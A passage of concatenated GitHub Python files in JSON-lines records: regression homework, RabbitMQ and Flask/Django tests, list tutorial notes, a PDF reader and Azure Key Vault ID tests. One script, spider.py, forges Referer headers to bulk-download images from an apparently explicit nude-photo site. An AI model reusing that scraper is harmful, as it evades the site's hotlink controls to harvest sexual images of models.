y_hat[b]], \"k-\")\nfor b in range(len(left_borders) - 1):\n plt.plot([right_borders[b], right_borders[b]], [y_hat[b], y_hat[b + 1]], \"k-\")\nplt.show()\n\n# calculating RMSE of regressogram for test data points\nrmse_regressogram_sum = 0\nfor a in range(len(left_borders)):\n for b in range(len(X_test)):\n if left_borders[a] < X_test[b] <= right_borders[a]:\n rmse_regressogram_sum += (Y_test[b] - y_hat[a]) ** 2\n\nrmse_regressogram = math.sqrt(rmse_regressogram_sum / N_test)\nprint(\"Regressogram => RMSE is \" + str(rmse_regressogram) + \" when h is \" + str(bin_width))\n\n\n# RUNNING MEAN SMOOTHER\n# function for calculating Running Mean Smoother of a given data set using given bin width based on training set\ndef rms_dataset(data_set, bw):\n rms = []\n for i in data_set:\n cur_sum = 0\n cnt = 0\n for j in range(len(X_train)):\n if i - bw / 2 < X_train[j] <= i + bw / 2:\n cur_sum += Y_train[j]\n cnt += 1\n if cnt == 0:\n rms.append(0)\n else:\n rms.append(cur_sum / cnt)\n return rms\n\n\n# Running Mean Smoother for data interval\ndata_interval_rms = rms_dataset(data_interval, bin_width)\n\n# drawing training data points, test data points, and running mean smoother in the same figure\nplt.figure(figsize=(8, 4))\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.title(\"h=3\")\nplt.plot(X_train, Y_train, \"b.\", markersize=3)\nplt.plot(X_test, Y_test, \"r.\", markersize=3)\nplt.plot(data_interval, data_interval_rms, \"k-\", markersize=3)\nplt.show()\n\n# calculating RMSE of running mean smoother for test data points\nrmse_rms_sum = 0\nfor a in range(len(data_interval_rms) - 1):\n for b in range(len(X_test)):\n if data_interval[a] < X_test[b] <= data_interval[a + 1]:\n rmse_rms_sum += (Y_test[b] - data_interval_rms[a]) ** 2\n\nrmse_rms = math.sqrt(rmse_rms_sum / 
N_test)\nprint(\"Running Mean Smoother => RMSE is \" + str(rmse_rms) + \" when h is \" + str(bin_width))\n\n# KERNEL SMOOTHER\nbin_width_kernel = 1\ndata_interval_kernel = []\nX_train_sorted = sorted(X_train)\nY_train_sorted = sorted(Y_train)\n\n\ndef K(x):\n return math.exp(-(x ** 2) / 2) / math.sqrt(2 * math.pi)\n\n\n# Kernel Smoother for data interval\nfor i in data_interval:\n cur_sum = 0\n general_sum = 0\n for j in range(len(X_train)):\n cur_sum += (K((i - X_train[j]) / bin_width_kernel) * Y_train[j])\n general_sum += K((i - X_train[j]) / bin_width_kernel)\n data_interval_kernel.append(cur_sum / general_sum)\n\n# drawing training data points, test data points, and running mean smoother in the same figure\nplt.figure(figsize=(8, 4))\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.title(\"h=3\")\nplt.plot(X_train, Y_train, \"b.\", markersize=3)\nplt.plot(X_test, Y_test, \"r.\", markersize=3)\nplt.plot(data_interval, data_interval_kernel, \"k-\", markersize=3)\nplt.show()\n\n# calculating the RMSE of kernel smoother for test data points\nrmse_kernel_sum = 0\nfor a in range(len(data_interval_kernel) - 1):\n for b in range(len(X_test)):\n if data_interval[a] < X_test[b] <= data_interval[a + 1]:\n rmse_kernel_sum += (Y_test[b] - data_interval_kernel[a]) ** 2\n\nrmse_kernel_rms = math.sqrt(rmse_kernel_sum / N_test)\nprint(\"Kernel Smoother => RMSE is \" + str(rmse_kernel_rms) + \" when h is \" + str(bin_width_kernel))\n","repo_name":"mburakaltun/ENGR421-Biweekly-Homeworks","sub_path":"Homework 04 - Nonparametric Regression.py","file_name":"Homework 04 - Nonparametric Regression.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30264104571","text":"import asynctest\nfrom fastapi.testclient import TestClient\nimport unittest\nimport os\n\nfrom services.rabbitMQServices import RabbitMQ\nfrom app_core.utils.messagetobase64 import conform_message_response\nfrom main import app\nclass TestRabbitMQIntegration(asynctest.TestCase):\n id_request = None\n\n @classmethod\n def setUpClass(cls):\n #Obtener token\n cls.id_request = None # \"e37d2ec8-b4d0-401d-9b0b-97750bc48c33\" #id de la solicitud\n\n async def test_a_connectMQ(self):\n try:\n self.rabbitmq = RabbitMQ()\n await self.rabbitmq.connect()\n await self.rabbitmq.close()\n self.assertTrue(True)\n except Exception as e:\n self.assertTrue(False)\n\n async def test_b_publish_message_request(self):\n try:\n self.rabbitmq = RabbitMQ()\n await self.rabbitmq.connect()\n test_message = {\n \"nombre\": \"Juan\",\n \"edad\": 30,\n \"ciudad\": \"Madrid\"\n }\n #id_request = await self.rabbitmq.publish_message(test_message)\n id_request = await self.rabbitmq.publish_message_request(test_message)\n if id_request is not None and len(id_request) > 0:\n self.__class__.id_request = id_request\n print(f\"Id de la solicitud: {id_request}\")\n await self.rabbitmq.close()\n self.assertTrue(True)\n except Exception as e:\n self.assertTrue(False)\n\n async def test_c_publish_message_response(self):\n if self.__class__.id_request is None:\n self.skipTest(\"No se ha podido obtener el id de la solicitud\")\n try:\n self.rabbitmq = RabbitMQ()\n await self.rabbitmq.connect()\n test_message = {\n \"analisis_mensaje\": \"Nombre: Juan, Edad: 30, Ciudad: Madrid\",\n \"fecha_análisis\": \"2021-05-01 12:00:00\",\n \"analista\": \"Analista 1\",\n \"resultado\": \"Nombres de personas: 1, Nombres de ciudades: 1, Edades: 1\"\n }\n await 
self.rabbitmq.publish_message_response(self.id_request,test_message)\n await self.rabbitmq.close()\n self.assertTrue(True)\n except Exception as e:\n self.assertTrue(False) \n\n\n async def test_d_consume_messages_request(self):\n if self.__class__.id_request is None:\n self.skipTest(\"No se ha podido obtener el id de la solicitud\")\n try:\n self.rabbitmq = RabbitMQ()\n await self.rabbitmq.connect()\n async def callback(message):\n if message.body is not None and len(message.body) > 0:\n #print(f\"Test_d_Mensaje de solicitud: {message.body.decode('utf-8')}\")\n self.assertTrue(True)\n else:\n test_message = {}\n self.assertEqual(message,test_message) \n await self.rabbitmq.consume_message_request(self.id_request,callback)\n await self.rabbitmq.close()\n self.assertTrue(True) \n except Exception as e:\n self.assertTrue(False)\n\n async def test_e_consume_messages_response(self):\n if self.__class__.id_request is None:\n self.skipTest(\"No se ha podido obtener el id de la solicitud\")\n try:\n self.rabbitmq = RabbitMQ()\n await self.rabbitmq.connect()\n async def callback(message):\n if message.body is not None and len(message.body) > 0:\n self.assertTrue(True)\n #print(f\"Mensaje de respuesta: {message.body.decode('utf-8')}\")\n else:\n test_message = {}\n self.assertEqual(message,test_message) \n await self.rabbitmq.consume_message_response(self.id_request,callback)\n await self.rabbitmq.close()\n self.assertTrue(True)\n except Exception as e:\n self.assertTrue(False) \n\nclass TestSecurityRoutes(unittest.TestCase):\n def setUp(self):\n self.client = TestClient(app)\n\n def test_login(self):\n username = os.getenv(\"USERNAME\")\n password = os.getenv(\"PASSWORD\")\n response = self.client.post(f\"/token?username={username}&password={password}\")\n self.assertEqual(response.status_code, 200)\n self.assertIn(\"access_token\", response.json())\n\nclass TestRabbitMQRoutes(unittest.TestCase):\n token = None\n id_request = None\n @classmethod\n def setUpClass(cls):\n cls.client = TestClient(app)\n username = os.getenv(\"USERNAME\")\n password = os.getenv(\"PASSWORD\")\n response = cls.client.post(f\"/token?username={username}&password={password}\") \n cls.token = response.json()[\"access_token\"]\n cls.id_request = None # \"c6dd778a-0aea-4736-85d6-f29a6608abca\" #id de la solicitud\n \n def setUp(self):\n self.client = TestClient(app)\n\n def test_a_publish_message_request(self):\n if self.__class__.token is None:\n self.skipTest(\"Se requiere un token válido para esta prueba.\")\n # Test publishing a message requesst\n test_message = {\n \"nombre\": \"Juan\",\n \"edad\": 30,\n \"ciudad\": \"Madrid\"\n }\n response_publish = self.client.post(f\"/publicar_mensaje_solicitud\",\n json=test_message,\n headers={\"Authorization\": f\"Bearer {self.token}\"})\n #print(f\"\\nJSON de Respuesta de publica_mensaje_solicitud:{response_publish.json()}\")\n self.assertEqual(response_publish.status_code, 200)\n self.assertIn(\"id_solicitud\", response_publish.json())\n self.__class__.id_request = response_publish.json()[\"id_solicitud\"]\n #print(f\"Id de la solicitud: {self.__class__.id_request}\")\n\n def test_b_publish_message_response(self):\n if self.__class__.token is None:\n self.skipTest(\"Se requiere un token válido para esta prueba.\")\n if self.__class__.id_request is None:\n self.skipTest(\"Se requiere un id de solicitud válido para esta prueba.\")\n # Test publishing a message response\n test_message = {\n \"analisis_mensaje\": \"Nombre: Juan, Edad: 30, Ciudad: Madrid\",\n \"fecha_análisis\": 
\"2021-05-01 12:00:00\",\n \"analista\": \"Analista 1\",\n \"resultado\": \"Nombres de personas: 1, Nombres de ciudades: 1, Edades: 1\"\n }\n id_request = self.__class__.id_request\n response_publish = self.client.post(f\"/publicar_mensaje_respuesta/{id_request}\",\n json=test_message,\n headers={\"Authorization\": f\"Bearer {self.token}\"})\n #print(response_publish)\n self.assertEqual(response_publish.status_code, 200)\n self.assertIn(\"id_solicitud\", response_publish.json())\n #print(response_publish.json())\n self.assertEqual(response_publish.json()[\"id_solicitud\"], id_request)\n \n def test_c_consume_message_request(self):\n if self.__class__.token is None:\n self.skipTest(\"Se requiere un token válido para esta prueba.\")\n if self.__class__.id_request is None:\n self.skipTest(\"Se requiere un id de solicitud válido para esta prueba.\")\n # Test consuming the message of the request\n id_request = self.__class__.id_request\n response_consume = self.client.get(f\"/consumir_mensaje_solicitud/{id_request}\", \n headers={\"Authorization\": f\"Bearer {self.token}\"})\n #print(f\"Response: {response_consume}\") \n #print(f\"Response JSON: {response_consume.json()}\")\n\n #self.assertEqual(response_consume.status_code, 200)\n #self.assertIn(\"request_analisis\", response_consume.json()[\"kind\"])\n\n def test_d_consume_message_response(self):\n if self.__class__.token is None:\n self.skipTest(\"Se requiere un token válido para esta prueba.\")\n if self.__class__.id_request is None:\n self.skipTest(\"Se requiere un id de solicitud válido para esta prueba.\")\n # Test consuming the message of the response\n id_request = self.__class__.id_request\n response_consume = self.client.get(f\"/consumir_mensaje_respuesta/{id_request}\", \n headers={\"Authorization\": f\"Bearer {self.token}\"})\n response_json = response_consume.json()\n if 'estado' in response_json:\n self.assertEqual(response_json, {'estado': 'error', 'detalle': 'no se recibio ningun mensaje'})\n else:\n self.assertEqual(\"response_analisis\", response_json[\"kind\"])\n\nif __name__ == '__main__':\n asynctest.main()\n unittest.main() ","repo_name":"BillyClassTime/AdvancedPython","sub_path":"cp8-PF/apirestfull/test/unit_integration.py","file_name":"unit_integration.py","file_ext":"py","file_size_in_byte":8893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"202458861","text":"# Python List Notes\n\n\n# tuples, lists and strings are sequences **\n# strings are sequences of characters and immutable\n# lists are sequences of any datatype and mutable\n# tuples are sequences of any datatype and immutable\n\n\n# --- LISTS ---\n\n# lists are mutable in python\n# --- CRUD list methods:\n\ndef list_methods():\n # define a list\n fruits = [\"Pineapple\", \"Apple\", \"Banana\", \"Orange\", \"Mango\"]\n print(fruits)\n \n # add to the end of the list\n fruits.append(\"Kiwi\")\n print(fruits)\n # add to the beginning of the list\n fruits.insert(0, \"orange\")\n print(fruits)\n # normally you'd either add to the beginning with insert(0) or the end with append()\n \n # remove the first occurance from the list\n fruits.remove(\"orange\")\n print(fruits)\n \n fruits.pop(2) # removes the item at the index, also returns the item at that index, so you can store it in a variable if needed\n print(fruits)\n \n # replace an item in the list by its index\n fruits[2] = \"Strawberry\"\n print(fruits)\n \n \n# TUPLES \n# Tuples are used when you need to ensure that an element is in a certain 
position and will not change. order of the elements in a tuple can't be changed, so the position of the element in a tuple can have meaning. When a function returns multiple values, what gets returned is a tuple, with the return values as elements in the tuple. The order of the returned values is important, and a tuple ensures that the order isn’t going to change. Storing the elements of a tuple in separate variables is called unpacking (it works similiar to object destructuring in JavaScript) This allows you to take multiple returned values from a function and store each value in its own variable.\n\ntuple_example = (1, 2, 3, 4, 5, 6, 7, 8, 9, 10)\n\ndef convert_seconds(seconds):\n # \n hours = seconds // 3600\n minutes = (seconds - hours * 3600) // 60\n remaining_seconds = seconds - hours * 3600 - minutes * 60\n return hours, minutes, remaining_seconds\n\ndef check_datatype_convert_seconds():\n result = convert_seconds(5000)\n print(type(result)) # \n \n# tuple methods:\n\n# ITERATING OVER A LIST AND TUPLE\n\ndef iterate_list():\n # for each string in the list, get its length and add it to the total\n # len() is used to get length of string and number of elements in the list\n animals = [\"Dog\", \"Cat\", \"Bird\", \"Fish\", \"Snake\"]\n x = 0\n for animal in animals:\n x += len(animal) # length of each string in the list\n \n # len(animals) is used to get the number of elements in the list\n print(f\"Total characters: {x}, Average length: {x / len(animals)}\")\n \ndef enumerate_function():\n # enumerate() takes a list as a parameter and returns a tuple for each element in the list. The first value in the tuple is the index, and the second is the element from the list at that index.\n \n winners = [\"Ashley\", \"Dylan\", \"Reese\"]\n for index, person in enumerate(winners):\n print(f\"{index + 1} -- {person}\")\n \ndef full_emails(people):\n result = []\n for email, name in people:\n result.append(f\"{name} <{email}>\")\n return result\n\n# print(full_emails([(\"alex@example.com\", \"Alex Diego\"), (\"shay@example.com\")]))\n\n# list comprehensions:\n\ndef list_comprehensions():\n multiples = []\n for x in range(1, 11):\n multiples.append(x*7)\n print(multiples)\n \n # or you could do it this way:\n multiples2 = [x*7 for x in range(1, 11)]\n print(multiples2)\n \n # list comprehensions create new lists based on ranges or sequences\n languages = [\"HTML\", \"JavaScript\", \"Python\", \"Ruby\"]\n lengths = [len(language) for language in languages]\n print(\"Lengths of strings in array: \", lengths)\n \n # list comps can use a conditional stmt to filter out values\n divisible_by_3 = [x for x in range(0, 101) if x % 3 == 0]\n print(divisible_by_3)\n \n # create a fn, takes 'n' as arg, returns a list of odd #s btw 1 and n inclusively\ndef odd_nums(n):\n return [ x for x in range(1, n + 1) if x % 2 != 0 ]\n \n # the odd_nums(n) function does the same thing as this long code:\n # my_list = []\n # for x in range(1,101):\n # if x % 10 == 0:\n # my_list.append(x)\n # print(my_list)\n\ndef replace_file_extensions():\n # this uses a list comprehension to replace all \".hpp\" extensions with \".h\"\n filenames = [\"program.c\", \"stdio.hpp\", \"sample.hpp\", \"a.out\", \"math.hpp\", \"hpp.out\"]\n\n newfilenames = [filename.replace(\".hpp\", \".h\") if filename[-4:] == \".hpp\" else filename for filename in filenames]\n\n print(newfilenames)\n\ndef pig_latin():\n text = input(\"Enter a phrase: \")\n words = text.split()\n pig_latin = \"\"\n\n for word in words:\n word = word[1:] + word[0] + \"ay \"\n 
pig_latin += word\n \n print(pig_latin)\n\n\ndef convert_linux_permissions():\n octal = input(\"Please enter an octal (Ex: 640): \")\n \n result = \"\"\n value_letters = [(4,\"r\"),(2,\"w\"),(1,\"x\")]\n # Iterate over each of the digits in octal\n for digit in [int(n) for n in str(octal)]:\n # Check for each of the permissions values\n for value, letter in value_letters:\n if digit >= value:\n result += letter\n digit -= value\n else:\n result += \"-\"\n\n print(f\"Linux file permissions: {result}\")\n\ndef group_list(group, users):\n return group + \": \" + \", \".join(users)\n\n# print(group_list(\"Marketing\", [\"Mike\", \"Karen\", \"Jake\", \"Tasha\"])) # \"Marketing: Mike, Karen, Jake, Tasha\"\n\ndef guest_list(guests): \n # unpacks each tuple\n\tfor guest in guests:\n\t\t(name, age, job) = guest\n\t\tprint(f\"{name} is {age} years old and works as {job}\")\n\n# guest_list([('Ken', 30, \"Chef\"), (\"Pat\", 35, 'Lawyer'), ('Amanda', 25, \"Engineer\")])\n\n","repo_name":"jroller33/Monty-Python","sub_path":"py crash course/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":5817,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"26888447780","text":"from django.test import TestCase\nfrom django.test.client import Client\nfrom urlshortener.models import ShortUrl\n\nclass SimpleTest(TestCase):\n\n def setUp(self):\n \"\"\"Actions to be performed before each test\"\"\"\n self.data = {'url': 'http://www.google.com',\n 'slug': 'a'}\n\n def tearDown(self):\n \"\"\"Actions to be performed after each test\"\"\"\n ShortUrl.objects.all().delete()\n\n def testUrl(self):\n \"\"\"Test that the url got created properly\"\"\"\n short_url = ShortUrl.objects.create(**self.data)\n self.assertEquals(short_url.slug, 'a')\n self.assertEquals(short_url.clicks, 0)\n result = ShortUrl.objects.all().count()\n self.assertEquals(result, 1)\n\n def testRedirection(self):\n \"\"\"Tests it redirects properly\"\"\"\n ShortUrl.objects.create(**self.data)\n c = Client()\n response = c.get('/a/')\n self.assertEqual(response['Location'], 'http://www.google.com')\n # check the tracking\n short_url = ShortUrl.objects.get(slug='a')\n self.assertEqual(short_url.clicks, 1)\n\n","repo_name":"alfredo/django-urlshortener","sub_path":"src/urlshortener/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"8725164277","text":"# Import statements\nfrom tkinter import Tk, Label, Button, StringVar, LEFT, X, BOTH, Spinbox, END, Frame\nfrom tkinter.filedialog import askopenfilename\nfrom tkinter.messagebox import showerror\nfrom tkinter import scrolledtext\nfrom tkinter.ttk import Combobox\nimport pyttsx3\nimport PyPDF2\nfrom time import sleep\n\n# initialization \nengine = pyttsx3.init('sapi5')\nroot = Tk()\nroot.title(\"Pdf Reader\")\nroot.minsize(650, 650)\n\n# file load function\ndef loadPdf():\n\n file = askopenfilename(defaultextension = \".pdf\", filetypes = [(\"pdf files\", \"*.pdf\")])\n \n try:\n book = open(file, 'rb')\n filename = file.split('/')\n title_lbl.config(text=filename[-1])\n\n global pdf\n\n pdf = PyPDF2.PdfFileReader(open(file, 'rb'))\n global pages\n\n pages = pdf.numPages\n\n # print(pages)\n\n pageNum.config(to=pages-1)\n\n pdf_read = pdf.getPage(0)\n global content\n\n content = pdf_read.extractText()\n\n textbox.delete(1.0, END)\n for line in content:\n textbox.insert(END, line)\n except 
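The lists.py notes above describe tuple unpacking of the convert_seconds return value and 1-based numbering with enumerate, but never show the unpacking call itself. A short illustration reusing the record's own function:

def convert_seconds(seconds):
    hours = seconds // 3600
    minutes = (seconds - hours * 3600) // 60
    remaining_seconds = seconds - hours * 3600 - minutes * 60
    return hours, minutes, remaining_seconds

# Unpacking: each returned value lands in its own variable, in order.
hours, minutes, seconds = convert_seconds(5000)
assert (hours, minutes, seconds) == (1, 23, 20)

# enumerate(..., start=1) avoids the manual index + 1 used in the record.
for place, person in enumerate(["Ashley", "Dylan", "Reese"], start=1):
    print(f"{place} -- {person}")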
Exception as e:\n print(\"\")\n title_lbl.config(text=\"label\")\n\n# Previous page\ndef prevpage(event):\n global pdf\n try:\n if int(pageNum.get()) == 0:\n return\n else:\n currentPage = int(pageNum.get())-1\n\n if int(currentPage) < 0:\n\n currentPage = 0\n\n pageNum.delete(0,END)\n\n pageNum.insert(END, 0)\n\n # print(currentPage)\n\n pageNum.delete(0, END)\n\n pageNum.insert(END, currentPage)\n\n pdf_read = pdf.getPage(int(currentPage))\n textbox.delete(1.0, END)\n\n global txt\n txt = pdf_read.extractText()\n for line in txt:\n textbox.insert(END, line)\n except Exception as e:\n print(\"\")\n showerror(title= \"Error changing page\", message= \"Please load the PDF\")\n\ndef nextpage(event):\n global pages, pdf\n try:\n currentPage = int(pageNum.get())+1\n if int(currentPage) > pages:\n currentPage = pages-1\n pageNum.delete(0,END)\n pageNum.insert(END, pages-1)\n\n pageNum.delete(0, END)\n pageNum.insert(END, currentPage)\n\n pdf_read = pdf.getPage(int(currentPage))\n textbox.delete(1.0, END)\n\n global txt\n txt = pdf_read.extractText()\n textbox.insert(END, txt)\n\n except Exception as e:\n print(\"\")\n showerror(title= \"Error changing page\", message= \"Please load the PDF\")\n\n\ndef goto():\n global pages, pdf\n try:\n goto_page = pageNum.get()\n if int(goto_page) < 0 or int(goto_page) > pages-1:\n showerror(title=\"Page not found\",\n message=\"Enter the valid page number.\")\n else:\n goto_txt = pdf.getPage(int(goto_page))\n textbox.delete(1.0, END)\n global goto_extractTxt\n goto_extractTxt = goto_txt.extractText()\n textbox.insert(END, goto_extractTxt)\n except Exception as e:\n print(\"\")\n showerror(title= \"Error changing page\", message= \"Please load the PDF\")\n\ndef readPdf():\n try:\n readtxt = textbox.get(1.0,END)\n read = engine.say(readtxt)\n\n engine.runAndWait()\n except Exception as e:\n print(\"\")\n showerror(title=\"Error reading the content\", message=\"Unable to read the PDF, Please load the PDF\")\n\n\ntitle_lbl = Label(text=\"label\", bg=\"black\", fg=\"white\")\ntitle_lbl.pack(padx=30, pady=10, ipadx=30, ipady=10, fill=X)\n\ntextbox = scrolledtext.ScrolledText(root, bg=\"white\", fg=\"black\", cursor=\"arrow\",\n font = (\"times new roman\", 10, \"bold\"))\ntextbox.pack(expand =1, fill = BOTH)\n\n\nload_btn = Button(text=\"Load PDF\", bg=\"black\", pady=5, fg=\"white\",command= loadPdf)\nload_btn.pack(side=LEFT, expand=1, pady=20, ipadx=10)\n\nprevPage_btn = Button(text=\"Previous\", pady=5, bg = \"green\")\nprevPage_btn.pack(side=LEFT, expand=1, pady=20, ipadx=10)\nprevPage_btn.bind(\"\", prevpage)\n\npageNum = Spinbox(root, from_=0, to=100, increment=1)\npageNum.pack(side=LEFT, expand=1)\n\nnxtPage_btn = Button(text=\"Next\", pady=5, bg = \"green\")\nnxtPage_btn.pack(side=LEFT, expand=1, pady=20, ipadx=10)\nnxtPage_btn.bind(\"\", nextpage)\n\ngoto_btn = Button(text=\"Go To\", bg=\"green\", pady=5, command=goto)\ngoto_btn.pack(side=LEFT, pady=20, ipadx=10)\n\n\nread_btn = Button(text=\"Read Page\", bg=\"black\",padx=10 ,pady=5, fg=\"white\",command= readPdf)\nread_btn.pack(expand=1, padx=20, pady=20, ipadx=10)\n\nroot.mainloop()\n\n","repo_name":"shubhamk2014/AudioBK","sub_path":"AudioBK.py","file_name":"AudioBK.py","file_ext":"py","file_size_in_byte":4495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12855064920","text":"from random import choice\n\nimport pytest\nfrom flask import url_for\n\nfrom registry.donor.models import Batch, Record\nfrom registry.extensions import db\n\nfrom 
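AudioBK.py above is written against the old PyPDF2 names (PdfFileReader, numPages, getPage, extractText), which were removed in PyPDF2 3.x. A minimal sketch of the same per-page text extraction with the current names, assuming a recent PyPDF2 release is installed:

from PyPDF2 import PdfReader

def read_page(path, page_number):
    # Return the extracted text of one page, or '' when the index is out of range.
    reader = PdfReader(path)
    if not 0 <= page_number < len(reader.pages):
        return ""
    return reader.pages[page_number].extract_text() or ""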
.helpers import login\n\n\nclass TestBatch:\n @pytest.mark.parametrize(\"batch_id\", range(1, 11))\n def test_batch_list(self, user, testapp, batch_id):\n \"\"\"Just a simple test that the detail page loads for some random donors\"\"\"\n login(user, testapp)\n res = testapp.get(url_for(\"batch.batch_list\"))\n format_time = testapp.app.jinja_env.filters[\"format_time\"]\n assert res.status_code == 200\n batch = db.session.get(Batch, batch_id)\n assert f\">{batch.id}\" in res\n assert f\">{format_time(batch.imported_at)}\" in res\n assert \"\" not in res\n\n @pytest.mark.parametrize(\"unused\", range(1, 6))\n def test_delete_batch(self, user, testapp, unused):\n login(user, testapp)\n res = testapp.get(url_for(\"batch.batch_list\"))\n # Take and submit random form\n form = choice(list(res.forms.values()))\n batch_id = form.fields[\"batch_id\"][0].value\n res = form.submit().follow()\n assert \"Dávka smazána.\" in res\n assert db.session.get(Batch, batch_id) is None\n assert Record.query.filter(Record.batch_id == batch_id).count() == 0\n\n def test_delete_nonexisting_batch(self, user, testapp):\n login(user, testapp)\n res = testapp.get(url_for(\"batch.batch_list\"))\n form = res.forms[0]\n # Modify the form content to point to batch that\n # does not exist.\n form.fields[\"batch_id\"][0].value = 99999\n res = form.submit().follow()\n assert \"Při odebrání dávky došlo k chybě.\" in res\n\n @pytest.mark.parametrize(\"unused\", range(1, 11))\n def test_batch_detail(self, user, testapp, unused):\n login(user, testapp)\n batch_id = choice([b.id for b in Batch.query.all()])\n res = testapp.get(url_for(\"batch.batch_detail\", id=batch_id))\n batch = db.session.get(Batch, batch_id)\n records_count = Record.query.filter(Record.batch_id == batch_id).count()\n if batch.donation_center:\n assert f\"Dávka z {batch.donation_center.title}\" in res\n else:\n assert \"Manuální dávka importována\" in res\n assert res.text.count(\"\") == records_count * res.text.count(\"\")\n\n @pytest.mark.parametrize(\"unused\", range(1, 11))\n def test_download_batch(self, user, testapp, unused):\n login(user, testapp)\n batch_id = choice([b.id for b in Batch.query.all()])\n res = testapp.get(url_for(\"batch.batch_detail\", id=batch_id))\n records_count = Record.query.filter(Record.batch_id == batch_id).count()\n batch_file = res.click(description=\"Stáhnout soubor s dávkou\")\n assert records_count == len(batch_file.text.splitlines())\n assert \";;\" not in batch_file.text\n assert \";\\n\" not in batch_file.text\n\n def test_download_batch_compare_file(self, user, testapp):\n login(user, testapp)\n res = testapp.get(url_for(\"batch.batch_detail\", id=7))\n batch_file = res.click(description=\"Stáhnout soubor s dávkou\")\n with open(\n \"tests/data/batch7_downloaded.txt\", encoding=\"utf-8\", newline=\"\"\n ) as f:\n content_to_compare = f.read()\n assert batch_file.text == content_to_compare\n","repo_name":"frenzymadness/donors_registry","sub_path":"tests/test_batch.py","file_name":"test_batch.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"12800899010","text":"from io import BytesIO\r\nimport requests\r\nfrom PIL import Image\r\n\r\n# img_url = \"https://profile.csdnimg.cn/F/6/F/3_cyj5201314\"\r\n# response = requests.get(img_url)\r\n# f = BytesIO(response.content)\r\n# img = Image.open(f)\r\n# print(img.size)\r\n\r\nimport time\r\nimport random\r\nimport json\r\n\r\n\r\ndef tojson(gid, pages, title):\r\n headers 
= {\r\n \"referer\": f\"https://xchina.xyz/photo/id-{gid}.html\",\r\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36\"\r\n }\r\n data = {\r\n \"title\": title,\r\n \"gid\": gid,\r\n \"root\": \"https://img.xchina.fun/photos\",\r\n \"data\": []\r\n }\r\n failed = []\r\n for i in range(1, 1+pages):\r\n thumbnail = f\"{i:04d}_300x0.jpg\"\r\n enlarged = f\"{i:04d}.jpg\"\r\n\r\n try:\r\n response = requests.get(f\"{data['root']}/{gid}/{thumbnail}\", headers=headers, timeout=15)\r\n tWidth, tHeight = Image.open(BytesIO(response.content)).size\r\n response = requests.get(f\"https://img.xchina.fun/photos/{gid}/{enlarged}\", headers=headers, timeout=15)\r\n eWidth, eHeight = Image.open(BytesIO(response.content)).size\r\n data[\"data\"].append([thumbnail, tWidth, tHeight, enlarged, eWidth, eHeight])\r\n\r\n print(enlarged, \" done\")\r\n except:\r\n print(enlarged, \"fail..................\")\r\n failed.append(i)\r\n time.sleep(random.random()/3)\r\n\r\n print(failed)\r\n with open(f\"{gid}.json\", 'w') as f:\r\n json.dump(data, f)\r\n print({\"title\": title, \"gid\": gid, \"pages\": pages})\r\n\r\ntojson(\"623073ef02e1c\", 327, \"国模亚美人体私拍套图\")\r\n\r\n\"\"\"\r\n61ff6f9b010ec 国模苏雅大尺度人体私拍套图\r\n614744206f460 国模紫嫣宾馆大尺度人体私拍套图\r\n6148afc303653 国模王小妞宾馆大尺度人体私拍套图\r\n61dab8c2c0b3e 国模李子瑶宾馆大尺度人体私拍套图\r\n61a718ed0ccb7 国模龙馨宾馆大尺度人体私拍套图\r\n61dac848d53d0 国模李梓熙野外大尺度私拍套图\r\n\r\n61c6c28caa317 国模子欣宾馆大尺度人体私拍套图\r\n61eb0967af7e1 国模苏菲亚宾馆人体私拍套图\r\n\"\"\"\r\n","repo_name":"meet-slut/meet-slut.github.io","sub_path":"script/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3563775202","text":"import pytest\nfrom azure.keyvault.secrets import KeyVaultSecretIdentifier\nfrom azure.keyvault.secrets._shared.client_base import DEFAULT_VERSION\nfrom devtools_testutils import recorded_by_proxy\n\nfrom _shared.test_case import KeyVaultTestCase\nfrom _test_case import SecretsClientPreparer\n\n\nclass TestParseId(KeyVaultTestCase):\n @pytest.mark.parametrize(\"api_version\", [(DEFAULT_VERSION)])\n @SecretsClientPreparer()\n @recorded_by_proxy\n def test_parse_secret_id_with_version(self, client, **kwargs):\n secret_name = self.get_resource_name(\"secret\")\n secret_value = \"secret_value\"\n # create secret\n created_secret = client.set_secret(secret_name, secret_value)\n\n # [START parse_key_vault_secret_id]\n secret = client.get_secret(secret_name)\n parsed_secret_id = KeyVaultSecretIdentifier(secret.id)\n\n print(parsed_secret_id.name)\n print(parsed_secret_id.vault_url)\n print(parsed_secret_id.version)\n print(parsed_secret_id.source_id)\n # [END parse_key_vault_secret_id]\n assert parsed_secret_id.name == secret_name\n assert parsed_secret_id.vault_url == client.vault_url\n assert parsed_secret_id.version == secret.properties.version\n assert parsed_secret_id.source_id == secret.id\n\n\ndef test_parse_secret_id_with_pending_version():\n source_id = \"https://keyvault-name.vault.azure.net/secrets/secret-name/pending\"\n parsed_secret_id = KeyVaultSecretIdentifier(source_id)\n\n assert parsed_secret_id.name == \"secret-name\"\n assert parsed_secret_id.vault_url == \"https://keyvault-name.vault.azure.net\"\n assert parsed_secret_id.version == \"pending\"\n assert parsed_secret_id.source_id == \"https://keyvault-name.vault.azure.net/secrets/secret-name/pending\"\n\n\ndef test_parse_deleted_secret_id():\n source_id = 
